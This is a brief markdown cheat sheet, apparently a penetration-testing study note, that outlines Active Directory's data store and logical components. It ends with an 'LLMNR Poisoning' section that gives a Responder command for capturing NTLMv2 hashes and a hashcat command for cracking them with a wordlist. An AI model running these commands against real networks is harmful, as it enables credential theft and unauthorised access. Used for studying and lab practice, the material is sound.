# Active Directory

> Methodologies for Active Directory Attacks

**Active Directory Data Store (ADDS):**

- Consists of NTDS.dit file
- It is stored by default in the %SystemRoot%\NTDS folder on all domain controllers
- It is accessible only through the domain controller processes and protocols

**Logical Components:**

1. ADDS Schems : Defines every type of object that can be stored in the directory. Enforces rules regarding object creation and configuration.

2. Domains : Domains are used to group and manage objects in an organization

3. Trees : A domain tree is a hierarchy of domains in AD DS.

4. Forests : It is a collection of one or more domain trees.

5. Organization Units (OUs) : OUs are Active Directory containers that can contain users, groups, computers, and other OUs.

6. Trusts : Trusts provide a mechanism for users to gain access to resources in another domain.

	- Directional
	- Transitive

7. Objects : User, groups, contacts, computer, printers, shared folders

### LLMNR Poisoning

Listening and Capturing Hashes using responder

```
sudo responder -I eth0 -rdwv
```

Cracking the Hashes (NTLMv2)

```
hashcat -m 5600 hashntlm.txt /home/kali/Hackthebox/Frolic/rockyouutf-8.txt --force
```

